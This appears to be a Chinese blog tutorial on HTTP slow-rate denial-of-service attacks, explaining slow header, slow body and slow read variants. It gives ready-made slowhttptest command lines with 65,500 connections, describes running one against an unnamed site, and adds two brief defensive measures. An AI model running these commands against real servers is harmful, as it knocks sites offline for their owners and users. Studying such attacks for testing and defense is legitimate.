1.声明:本文仅限学习研究讨论,切忌做非法乱纪之事!

什么是HTTP慢速攻击?

HTTP慢速攻击是利用HTTP合法机制,以极低的速度往服务器发送HTTP请求,尽量长时间保持连接,不释放,若是达到了Web Server对于并发连接数的上限,同时恶意占用的连接没有被释放,那么服务器端将无法接受新的请求,导致拒绝服务。

简单来说,就是我们每次只发一行,每次发送之间的间隔时间很长,这迟迟未发送结束的HTTP包会占用服务端的资源,当达到服务端处理请求的上限时,这时候再用户对网站正常请求,服务端也处理不了了,导致了拒绝服务。

HTTP 慢速攻击也叫 slow http attack,是一种 DoS 攻击的方式。

目的

消耗服务器的连接和内存资源。

如果客户端持续建立这样的连接,那么服务器上可用的连接将一点一点被占满,从而导致DoS(拒绝服务)。

首先HTTP协议的报文都是一行一行的,类似于:

  1. GET / HTTP/1.1\r\n

  2. Host : payloads.online\r\n

  3. Connection: keep-alive\r\n

  4. Keep-Alive: 900\r\n

  5. Content-Length: 100000000\r\n

  6. Content_Type: application/x-www-form-urlencoded\r\n

  7. Accept: *.*\r\n

  8. \r\n

那么报文中的\r\n是什么?

\r\n代表一行报文的结束也被称为空行(CRLF),而\r\n\r\n代表整个报文的结束

HTTP慢速攻击分为三类:

  • Slow headers

  • Slow body

  • Slow read

  • 一般使用slowhttptest工具

  • 工具简介

    SlowHTTPTest是一个可配置的应用层拒绝服务攻击测试工具,它可以工作在Linux,OSX和Cygwin环境以及Windows命令行接口,可以帮助安全测试人员检验服务器对慢速攻击的处理能力。

    这个工具可以模拟低带宽耗费下的DoS攻击,比如慢速攻击,慢速HTTP POST,通过并发连接池进行的慢速读攻击(基于TCP持久时间)等。慢速攻击基于HTTP协议,通过精心的设计和构造,这种特殊的请求包会造成服务器延时,而当服务器负载能力消耗过大即会导致拒绝服务。

    使用参数介绍

    测试模式:
    -H                           slow header,slowloris默认采用此模式          
    -B                           slow body
    -R                           远程攻击又名Apache killer
    -X                           slow read

    报告选项:
    -g                           生成具有套接字状态更改的统计信息(默认关闭)
    -o file_prefix               将统计信息输出保存在file.html和file.csv中(需要-g)
    -v level                     日志信息,详细级别0-4:致命,信息,错误,警告,调试

    常规选项:
    -c connections               连接目标连接数(50)
    -i seconds                   后续数据之间的间隔(以秒为单位)(10)
    -l seconds                   测试目标时间长度,以秒为单位(240)
    -r rate                       每秒连接数(50)
    -s                           如果需要,Content-Length标头的值(4096)
    -t                           在请求中使用的动词,对于slow header和response,默认为GET;对于slow body,默认为POST
    -u URL                       目标的绝对URL(http://localhost/)
    -x                           在slowloris and Slow POST tests模式中,指定发送的最大数据长度
    -f                           Content-Type标头的值(application/x-www-form-urlencoded)
    -m                           接受(Accept)标头的值(text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5)

    探测/代理选项:
    -d host:port                 为所有连接指定代理
    -e host:port                 为探测连接指定代理
    -p seconds                   指定等待时间来确认DoS攻击已经成功

    range attack特定选项:
    -a                           标头中的起始位置
    -b                           标头中的结束位置

    slow read特定选项:
    -k                           在连接中重复相同请求的次数。如果服务器支持永久连接,则用于成倍增加响应大小。
    -n                           从recv缓冲区读取操作之间的时间间隔,以秒为单位(1)
    -w                           slow read模式中指定tcp窗口范围下限
    -y                           slow read模式中指定tcp窗口范围上限
    -z                           在每次的read中,从buffer中读取数据量

    对于三种类型的慢速攻击,分别给出payload:(摘抄的!)

    Slow Header

    1

    slowhttptest -c 65500 -H -i 10 -r 200 -s 8192 -t SLOWHEADER -u http://vulurl.com

    该攻击会像我们刚才讲的慢速传递HTTP报文,占用服务器资源让其等待我们最后的CRLF。

    Slow Read

    1

    slowhttptest -c 65500 -X -r 1000 -w 10 -y 20 -t SLOWREAD -n 5 -z 32 -u http://vulurl.com

    该攻击会在Web服务器响应内容传输回来的时候,我们客户端缓慢的读取响应报文,这样服务器端也会一直等待客户端来接收完毕。

    Slow Post

    1

    slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u http://vulurl.com

    该攻击会构造一个POST数据包,将数据缓慢传输,使服务器端一直等待接收报文。

    找一个存在漏洞的网址进行检测:

    使用kali 自带的slowhttptest,Slow Post的payload:

    1

    slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u https://xxxxxx

如何防御

  1. 可对每秒钟http并发连接数进行检查。

  2. 对web服务器的http头部传输的最大许可时间进行限制。

http拒绝服务攻击(Avws复现)相关推荐

  1. GitChat 被恶意攻击引发的技术性思考:拒绝服务攻击

    本文来自作者 肖志华 在 GitChat 上分享 「GitChat 被恶意攻击引发的技术性思考:拒绝服务攻击」,「阅读原文」查看交流实录. 「文末高能」 编辑 | 哈比 拒绝服务的类型很多,挑几个有特 ...

  2. 浅谈几种区块链网络攻击以及防御方案之拒绝服务攻击

    旧博文,搬到 csdn 原文:http://rebootcat.com/2020/04/14/network_attack_of_blockchain_ddos_attack/ 写在前面的话 自比特币 ...

  3. DHCP拒绝服务攻击工具DHCPig

    DHCP拒绝服务攻击工具DHCPig DHCP服务负责网络的IP分配服务.通过攻击该服务,可以导致网络内主机获取不到IP,而无法正常使用网络.Kali Linux提供一款专用工具DHCPig.该工具借 ...

  4. 检测到目标主机可能存在缓慢的HTTP拒绝服务攻击

    受影响站点    *********** 详细描述    缓慢的HTTP拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量HTTP请求攻击,直到 ...

  5. 【计算机网络】网络安全 : 计算机网络安全威胁 ( 四种网络攻击类型 | 主动攻击与被动攻击 | 分布式拒绝服务攻击 DDos | 恶意程序 | 计算机网络安全目标)

    文章目录 一.网络安全内容 二.四种网络攻击 三.被动攻击 与 主动攻击 四.分布式拒绝服务 DDos 五.恶意程序 六.计算机网络安全目标 一.网络安全内容 网络安全内容 : 网络安全概述 对称加密 ...

  6. 分布式拒绝服务攻击(DDoS)原理及防范

    转自:http://www.cnblogs.com/rootq/archive/2009/11/06/1597215.html http://www.ibm.com/developerworks/cn ...

  7. DRDoS(memcache漏洞导致的反射型分布式拒绝服务攻击)

    一.DDoS基础 见博文:DDoS攻击与防御 二.Memcached 反射DDOS攻击原理 反射DDOS是发送大量带有被害者IP地址的请求给反射服务器,反射服务器对IP地址源做出大量回应,形成拒绝服务 ...

  8. dos攻击命令_Kali Linux系列之拒绝服务攻击(DOS)实战(上)

    (你的世界是个什么样的世界?你说,我们倾听!) ----------------- 小百科 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一.其实对网络带宽进行的消耗性攻击 ...

  9. DRDoS分布反射式拒绝服务攻击(什么是DRDoS)

    什么是DRDoS DRDoS分布反射式拒绝服务攻击这是DDoS攻击的变形,它与DDoS的不同之处就是DrDoS不需要在攻击之前占领大量的"肉鸡".它的攻击原理和Smurf攻击原理相 ...

最新文章

  1. hdu 2098 分拆素数和(一个偶数拆分成两个不同素数和 拆法数量)
  2. 学车比学计算机简单,帅哥自述:学车比上班还要累
  3. tensor如何实现转置_PyTorch中的傅立叶卷积:通过FFT有效计算大核卷积的数学原理和代码实现...
  4. 数学建模(2)topsis分析法
  5. qmake,make,nmake
  6. 人机大战简史(第二版)
  7. 正态分布的概率密度函数 python_多元正态分布概率密度函数的三维绘图
  8. 新浪云sae部署php,如何在新浪云 SAE 上安装部署 Laravel 5.1 应用并测试数据库连接...
  9. ITIL工具系列之Tivoli
  10. 【Android工具】盘点几个有应用历史版本功能的应用商店
  11. AI芯片:寒武纪ShiDianNao结构分析
  12. Php使用ZipArchive打包下载文件、图片
  13. 基于注意力机制的 中 英机器翻译
  14. 手把手教你做第一个RPA机器人流程
  15. 1.2 聪明的投资者:投资与投机(聪明投资者的预期收益)
  16. 打造建筑行业数字化新标杆: 软通动力联合华为云AI+RPA助力中铁十一局智能化升级
  17. Activiti 数据库表结构 ACT_GE_PROPERTY
  18. C语言 二分查找(循环实现)
  19. 计算机应用模拟卷,计算机应用期末模拟试卷B卷
  20. win10蓝牙突然消失,在设备管理器中也没有蓝牙信息,也没有感叹号的硬件

热门文章

  1. STM32智能门锁之调试步进电机
  2. 【转载】用cx_Freeze把Python代码打包成单个独立的exe可执行文件
  3. 新页微NY7503S无线充芯片10w
  4. 使用librtmp库进行推流与拉流
  5. 【渝粤题库】陕西师范大学202491 法语(一)作业
  6. opencv2413 gpu mog2_gpu CascadeClassifier_GPU
  7. Oracle学习—图书管理系统_存储过程
  8. dropout层加在哪里_系列解读Dropout
  9. Zeppelin(0.10.1版本)安装及创建hive解释器
  10. NAR:人类虚拟代谢数据库——整理人类和肠道菌群与营养和疾病